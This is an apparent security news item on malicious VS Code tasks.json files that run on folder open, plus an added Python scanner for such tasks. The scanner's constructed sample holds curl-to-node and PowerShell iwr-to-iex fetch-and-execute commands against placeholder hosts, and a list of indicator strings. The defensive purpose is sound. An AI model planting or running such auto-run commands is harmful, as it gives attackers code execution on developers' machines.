Misuse of VS Code tasks poses risk to developers
"This is not a vulnerability in Visual Studio Code itself, but rather functionality that works as intended. The tasks.json file is designed to launch command line tools from within the editor and can automatically execute tasks as soon as a folder is opened. These configurations are usually located in the hidden .vscode folder and are easily shared when code is shared via platforms such as GitHub."
"Microsoft has built in several protective measures. Folders are marked as untrusted by default, and tasks are only executed after a user explicitly grants trust. A warning also appears when code is started automatically. In practice, however, this protection appears to be of limited effectiveness. The dialog box visually emphasizes continuing after granting trust, while the warning text points out the risks. In addition, previously set trust rules can cause new subfolders to be automatically accepted."
"The findings of Jamf Threat Labs illustrate how far this abuse can go. In the case investigated, a backdoor was installed via tasks.json that enabled remote code execution, mapped systems, and maintained a persistent connection to a command and control server. The tasks contained commands for macOS, Windows, and Linux and retrieved external JavaScript via curl. Because the payload was hosted exte"
Security researchers have identified Visual Studio Code task configurations being used in supply chain attacks. A tasks.json file can run commands automatically as soon as a project folder is opened; because it lives in the hidden .vscode folder and is checked in alongside the code, a malicious configuration travels with any repository shared through platforms such as GitHub. Microsoft's trust prompt and warning are meant to block this, but the dialog steers users toward granting trust, and trust already granted to a parent folder is inherited by new subfolders. Jamf Threat Labs documented a case in which a tasks.json installed a backdoor that provided remote code execution, mapped the system, kept a persistent connection to a command and control server, carried commands for macOS, Windows, and Linux, and fetched external JavaScript via curl.
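To make the mechanism concrete, the following is an added example, not code from the Techzine article or from Jamf Threat Labs. It is a small Python scanner that walks a checked-out repository, parses every .vscode/tasks.json it finds (including the comments and trailing commas VS Code tolerates), reports each task configured to run on folder open, renders the command for the default and per-OS variants, and flags fetch-and-execute patterns. The embedded tasks.json and its example.invalid URLs are constructed for illustration, and the indicator list is a heuristic of my own, not something the article specifies.

```python
"""Scan a repository for VS Code tasks that run on folder open.

Added example, not code from the Techzine article or Jamf Threat Labs.
The embedded tasks.json is constructed; its URLs are placeholders."""
import json
import os
import re
import tempfile

# tasks.json is JSON-with-comments: group 1 protects string literals (so
# "https://..." is not read as a comment), group 2 keeps the bracket that
# follows a trailing comma; bare comment matches are dropped.
_JSONC_RE = re.compile(
    r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/|,(\s*[}\]])', re.S)


def jsonc_to_json(text: str) -> str:
    """Strip comments and trailing commas without touching string contents."""
    def repl(m):
        if m.group(1) is not None:
            return m.group(1)      # string literal: keep verbatim
        if m.group(2) is not None:
            return m.group(2)      # trailing comma: drop comma, keep } or ]
        return ""                  # comment: drop
    return _JSONC_RE.sub(repl, text)


def parse_tasks_json(text: str) -> dict:
    return json.loads(jsonc_to_json(text))


# A task may override command/args per OS under these keys; the case in the
# article carried per-OS commands, so every variant must be inspected.
OS_KEYS = ("windows", "osx", "linux")
# Heuristic indicators of fetch-and-execute behaviour (my own list, extend it).
SUSPICIOUS = ("curl", "wget", "iwr", "invoke-webrequest", "powershell",
              "| sh", "| bash", "| node", "node -e", "http://", "https://")


def render_command(task: dict, os_key: str = None) -> str:
    """Join command and args, applying the OS-specific override when present."""
    section = task.get(os_key, {}) if os_key else {}
    command = section.get("command", task.get("command", ""))
    args = section.get("args", task.get("args", []))
    # args may be plain strings or {"value": ..., "quoting": ...} objects
    rendered = [a if isinstance(a, str) else str(a.get("value", "")) for a in args]
    return " ".join([str(command)] + rendered).strip()


def find_auto_run_tasks(doc: dict) -> list:
    """Return tasks with runOptions.runOn == "folderOpen" and their commands."""
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        commands = {"default": render_command(task)}
        for os_key in OS_KEYS:
            if os_key in task:
                commands[os_key] = render_command(task, os_key)
        indicators = sorted({needle for cmd in commands.values()
                             for needle in SUSPICIOUS if needle in cmd.lower()})
        findings.append({"label": task.get("label", "<unnamed>"),
                         "commands": commands, "indicators": indicators})
    return findings


def scan_repo(root: str) -> list:
    """Walk the whole tree: trust granted to a parent folder is inherited by
    subfolders, so a tasks.json in a nested .vscode directory counts too."""
    results = []
    for dirpath, _dirs, filenames in os.walk(root):
        if os.path.basename(dirpath) != ".vscode" or "tasks.json" not in filenames:
            continue
        path = os.path.join(dirpath, "tasks.json")
        with open(path, encoding="utf-8") as fh:
            try:
                doc = parse_tasks_json(fh.read())
            except json.JSONDecodeError:
                continue           # unparsable: deserves a manual look
        for finding in find_auto_run_tasks(doc):
            finding["path"] = path
            results.append(finding)
    return results


# Constructed sample: a harmless build task plus an auto-run task that pipes
# remote code into an interpreter, with a Windows-specific variant.
SAMPLE_TASKS_JSON = r'''{
    // constructed sample, not a real payload
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "sync deps",
            "type": "shell",
            "command": "curl -fsSL https://example.invalid/loader.js | node",
            "windows": { "command": "powershell -c \"iwr https://example.invalid/loader.ps1 | iex\"" },
            "runOptions": { "runOn": "folderOpen" }
        }
    ]
}'''


def demo() -> list:
    """Write the sample into a nested project tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        vscode_dir = os.path.join(root, "packages", "app", ".vscode")
        os.makedirs(vscode_dir)
        with open(os.path.join(vscode_dir, "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return scan_repo(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: '{f['label']}' runs on folder open; indicators: {f['indicators']}")
```

Run it against a fresh clone before opening the folder in VS Code or granting workspace trust. On the sample it reports only the "sync deps" task, with the default and Windows commands side by side and curl, iwr and powershell among the indicators; the build task is ignored because it has no runOn setting.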
Read at Techzine Global